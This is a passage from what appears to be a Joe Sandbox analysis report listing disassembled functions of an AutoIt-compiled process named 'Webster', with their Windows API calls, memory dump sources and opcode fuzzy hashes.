                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3970641297-0
                                                                                  • Opcode ID: 434ca1b1c29da95d7a6b2bf9a521ec383878686cbbf0e2a3c0dac24611b696dd
                                                                                  • Instruction ID: d0e7a149946f67070f574e5b066aeb7380ea77325535d04c5c409d044110d47f
                                                                                  • Opcode Fuzzy Hash: 434ca1b1c29da95d7a6b2bf9a521ec383878686cbbf0e2a3c0dac24611b696dd
                                                                                  • Instruction Fuzzy Hash: 1B118B7211124DBFDB02AFA09C48EEABB69EF58354F154202FA0452064CB71DCA0DBA0
                                                                                  Function 00AE1941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AE04EC,?,00AE153F,?,00008000), ref: 00AE195E
                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00AE04EC,?,00AE153F,?,00008000), ref: 00AE1983
                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AE04EC,?,00AE153F,?,00008000), ref: 00AE198D
                                                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,00AE04EC,?,00AE153F,?,00008000), ref: 00AE19C0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                  • String ID:
                                                                                  • API String ID: 2875609808-0
                                                                                  • Opcode ID: d2d1d714062449e9456198ba6b4f829981fdf566fda3c8af2b8547272bae192b
                                                                                  • Instruction ID: 6f98d533f980a6aa1f9692c01a17f4915307efe2088934c6869120e901c259ff
                                                                                  • Opcode Fuzzy Hash: d2d1d714062449e9456198ba6b4f829981fdf566fda3c8af2b8547272bae192b
                                                                                  • Instruction Fuzzy Hash: 45113C31D0456DEBCF00AFE6D998AEEBB78FF09751F408155E980B3242CB3496A08B95
                                                                                  Function 00B0E1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00B0E1EA
                                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00B0E201
                                                                                  • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00B0E216
                                                                                  • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00B0E234
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Type$Register$FileLoadModuleNameUser
                                                                                  • String ID:
                                                                                  • API String ID: 1352324309-0
                                                                                  • Opcode ID: 8bfd5ab92a10f77c9f6f3acfa76182743d2604e2d8bb2b2daaba5aec03b58b48
                                                                                  • Instruction ID: ca9674c70e9441e898109c279bb2ad069436972c05a34e6fe5bebdfaf7de5ffd
                                                                                  • Opcode Fuzzy Hash: 8bfd5ab92a10f77c9f6f3acfa76182743d2604e2d8bb2b2daaba5aec03b58b48
                                                                                  • Instruction Fuzzy Hash: FD115EB52053049BE7309F51ED48F93BBFCEB40B00F108999A626D6190DBB0E5449BA1
                                                                                  Function 00AB71E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                  • String ID:
                                                                                  • API String ID: 3016257755-0
                                                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                  • Instruction ID: ce5863f4027d1d8f18c25c9af6f7905e581a62f7b280632b567b0a3466d7eea1
                                                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                  • Instruction Fuzzy Hash: 30019E3204814EBBCF125F84CC01CEE3F2ABBA9340F098515FE1868132C776C9B1AB81
                                                                                  Function 00B0B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(?,?), ref: 00B0B956
                                                                                  • ScreenToClient.USER32(?,?), ref: 00B0B96E
                                                                                  • ScreenToClient.USER32(?,?), ref: 00B0B992
                                                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B0B9AD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 357397906-0
                                                                                  • Opcode ID: 069d795c5b2355c9fc89fbcd4a9df896a8ae4bc548efa81b57f3561975633974
                                                                                  • Instruction ID: 0a96f412bf2ad4ec2411d46993958a4749e2b6c03b164052c36dfe8f2b7cd141
                                                                                  • Opcode Fuzzy Hash: 069d795c5b2355c9fc89fbcd4a9df896a8ae4bc548efa81b57f3561975633974
                                                                                  • Instruction Fuzzy Hash: B81144B9D00209EFDB41DF98C984AEEBBF9FF48310F508156E914E3610D775AA658F50
                                                                                  Function 00B0BCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00B0BCB6
                                                                                  • _memset.LIBCMT ref: 00B0BCC5
                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B48F20,00B48F64), ref: 00B0BCF4
                                                                                  • CloseHandle.KERNEL32 ref: 00B0BD06
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                                  • String ID:
                                                                                  • API String ID: 3277943733-0
                                                                                  • Opcode ID: 237416d36b093ed81f5a13a0ad9f75e4e9ae480a7dbc9ff1e46bf3eea2550f2c
                                                                                  • Instruction ID: 794f700a2ea8980b5d852e05aff99e6dc73e548e03300f8d4fdc55b441ff7828
                                                                                  • Opcode Fuzzy Hash: 237416d36b093ed81f5a13a0ad9f75e4e9ae480a7dbc9ff1e46bf3eea2550f2c
                                                                                  • Instruction Fuzzy Hash: 3AF05EB6550304BFE6503B65AC05FBF7A9DEB0A750F004921BA08EB1A2DF724A1497A9
                                                                                  Function 00AE7195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00AE71A1
                                                                                    • Part of subcall function 00AE7C7F: _memset.LIBCMT ref: 00AE7CB4
                                                                                  • _memmove.LIBCMT ref: 00AE71C4
                                                                                  • _memset.LIBCMT ref: 00AE71D1
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00AE71E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 48991266-0
                                                                                  • Opcode ID: 8cf9e4c141c6714071b13523a61bce7b283548fc01b0802668504a5db271b8b1
                                                                                  • Instruction ID: bd980256a38185fe9e4d283ba047c1d27ba406083abe331b56c102f5ee91cfdf
                                                                                  • Opcode Fuzzy Hash: 8cf9e4c141c6714071b13523a61bce7b283548fc01b0802668504a5db271b8b1
                                                                                  • Instruction Fuzzy Hash: F8F0543A100104ABCF016F55DD85A8ABB29EF4A320F04C051FE085F25ACB75A951DBB4
                                                                                  Function 00B0C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A816CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A81729
                                                                                    • Part of subcall function 00A816CF: SelectObject.GDI32(?,00000000), ref: 00A81738
                                                                                    • Part of subcall function 00A816CF: BeginPath.GDI32(?), ref: 00A8174F
                                                                                    • Part of subcall function 00A816CF: SelectObject.GDI32(?,00000000), ref: 00A81778
                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B0C3E8
                                                                                  • LineTo.GDI32(00000000,?,?), ref: 00B0C3F5
                                                                                  • EndPath.GDI32(00000000), ref: 00B0C405
                                                                                  • StrokePath.GDI32(00000000), ref: 00B0C413
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                  • String ID:
                                                                                  • API String ID: 1539411459-0
                                                                                  • Opcode ID: f2daae1cff7f5494c096d2e10d0f5dfa8a4d4dc93ef9725fe9750535833fafe4
                                                                                  • Instruction ID: b977add5847bd41d1cdcb75ff16aee132551dcedc3c3ca005f1d273bbff7c743
                                                                                  • Opcode Fuzzy Hash: f2daae1cff7f5494c096d2e10d0f5dfa8a4d4dc93ef9725fe9750535833fafe4
                                                                                  • Instruction Fuzzy Hash: 05F0BE31045218BBDB126F55AC0EFCE3F99BF0A310F448040FA51621E1CBB416A5DBA9
                                                                                  Function 00ADAA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ADAA6F
                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ADAA82
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00ADAA89
                                                                                  • AttachThreadInput.USER32(00000000), ref: 00ADAA90
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2710830443-0
                                                                                  • Opcode ID: e310340a574d058b6dd5d17797b901cb497a7fbf1cdcf076d0fb772d5f9f579f
                                                                                  • Instruction ID: 8d82df5f76316cdb9bd6ba0ba8a0dbc019cb7873b0495cf3d9c4142d209ba4c7
                                                                                  • Opcode Fuzzy Hash: e310340a574d058b6dd5d17797b901cb497a7fbf1cdcf076d0fb772d5f9f579f
                                                                                  • Instruction Fuzzy Hash: 8AE0E53154522876DB216FA1DD0DED77F6CEF267E1F40C116F50995060CBB58590CBE1
                                                                                  Function 00A825F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000008), ref: 00A8260D
                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 00A82617
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00A8262C
                                                                                  • GetStockObject.GDI32(00000005), ref: 00A82634
                                                                                  • GetWindowDC.USER32(?,00000000), ref: 00ABC1C4
                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00ABC1D1
                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 00ABC1EA
                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 00ABC203
                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00ABC223
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00ABC22E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1946975507-0
                                                                                  • Opcode ID: 24e61949b54abef2f85cc311003d1068f344d6951caf4d2d9fce91918b647e73
                                                                                  • Instruction ID: b18db6821f12a5bed5f2569a3cf0833cbfeda140c608cd17ae61bf8a0541cbf0
                                                                                  • Opcode Fuzzy Hash: 24e61949b54abef2f85cc311003d1068f344d6951caf4d2d9fce91918b647e73
                                                                                  • Instruction Fuzzy Hash: 6EE06D31514244BBDB216FB8BC49BE83B15EB15332F54C366FA69680E2CBB14AD0DB11
                                                                                  Function 00AD9330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentThread.KERNEL32 ref: 00AD9339
                                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00AD8F04), ref: 00AD9340
                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00AD8F04), ref: 00AD934D
                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00AD8F04), ref: 00AD9354
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                                  • String ID:
                                                                                  • API String ID: 3974789173-0
                                                                                  • Opcode ID: 40c0be3564e177cbc3c0953c2bc8cda8a6ec1bc332bb4f2b6dc4cceff3ce8765
                                                                                  • Instruction ID: 48e8ab8f4fc8becc10ff46ebba0c0f02aead099122f46f9197dbaba35c0da15c
                                                                                  • Opcode Fuzzy Hash: 40c0be3564e177cbc3c0953c2bc8cda8a6ec1bc332bb4f2b6dc4cceff3ce8765
                                                                                  • Instruction Fuzzy Hash: E7E04F366112159FD7202FB16D0DB973B6CAF56791F118818A246CF090EE749584C754
                                                                                  Function 00AC0679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDesktopWindow.USER32 ref: 00AC0679
                                                                                  • GetDC.USER32(00000000), ref: 00AC0683
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AC06A3
                                                                                  • ReleaseDC.USER32(?), ref: 00AC06C4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2889604237-0
                                                                                  • Opcode ID: 845c54679ac3cbb29024c4e6c82a1962f277ae1d4b73eda3172dbb59cf3f2361
                                                                                  • Instruction ID: b5691c3da1e6b83412e5952375e8dbb1bfc8a93496b590599d419a8246ecef99
                                                                                  • Opcode Fuzzy Hash: 845c54679ac3cbb29024c4e6c82a1962f277ae1d4b73eda3172dbb59cf3f2361
                                                                                  • Instruction Fuzzy Hash: EEE0E571810204EFCB01AF60D808A9D7BB1AB8C310F51C009F85AE7210DFB885919F50
                                                                                  Function 00AC068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDesktopWindow.USER32 ref: 00AC068D
                                                                                  • GetDC.USER32(00000000), ref: 00AC0697
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AC06A3
                                                                                  • ReleaseDC.USER32(?), ref: 00AC06C4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2889604237-0
                                                                                  • Opcode ID: c15b7d136e040355fed302cbe58d72bdc0f1c345fe6bace309029ddd8d5c2e14
                                                                                  • Instruction ID: fe315722349c5d6a8c76757c63a7346cfa2b7a5bce59882d2ff8352fa2d5cd9e
                                                                                  • Opcode Fuzzy Hash: c15b7d136e040355fed302cbe58d72bdc0f1c345fe6bace309029ddd8d5c2e14
                                                                                  • Instruction Fuzzy Hash: 43E012B1810204AFCB02AFA0D80CA9D7BF2AB8C310F51C008F95AE7210DFB895918F50
                                                                                  Function 00ADBE8C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 00ADC057
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContainedObject
                                                                                  • String ID: AutoIt3GUI$Container
                                                                                  • API String ID: 3565006973-3941886329
                                                                                  • Opcode ID: c347b035862a30cf42e332578bb4dc3101bcf91fa946abff8dface2455b77fce
                                                                                  • Instruction ID: f05f91fa9d74335f1db79d0dc22ab85aad193397897ce4fcea621dc94696fcd6
                                                                                  • Opcode Fuzzy Hash: c347b035862a30cf42e332578bb4dc3101bcf91fa946abff8dface2455b77fce
                                                                                  • Instruction Fuzzy Hash: EC912671600202EFDB14DF68C884A6ABBF5EF49710F20856EF94ADB391DB71E941CB60
                                                                                  Function 00AEB5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A9436A: _wcscpy.LIBCMT ref: 00A9438D
                                                                                    • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                                                    • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                                                  • __wcsnicmp.LIBCMT ref: 00AEB670
                                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00AEB739
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                  • String ID: LPT
                                                                                  • API String ID: 3222508074-1350329615
                                                                                  • Opcode ID: ac579fe03da73d4a6c8f45bb4a3ce27c2e9d67e0f088cf95998e8dd9f191d502
                                                                                  • Instruction ID: 95ab2c5c5d9f04da1bef498b60aba8614b4b361f66e7126c19a2ac21a6310b41
                                                                                  • Opcode Fuzzy Hash: ac579fe03da73d4a6c8f45bb4a3ce27c2e9d67e0f088cf95998e8dd9f191d502
                                                                                  • Instruction Fuzzy Hash: CC61A275A10219EFCB14EF95C995EAFB7B4EF48310F118159F906AB391DB70AE40CBA0
                                                                                  Function 00A8E00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000000), ref: 00A8E01E
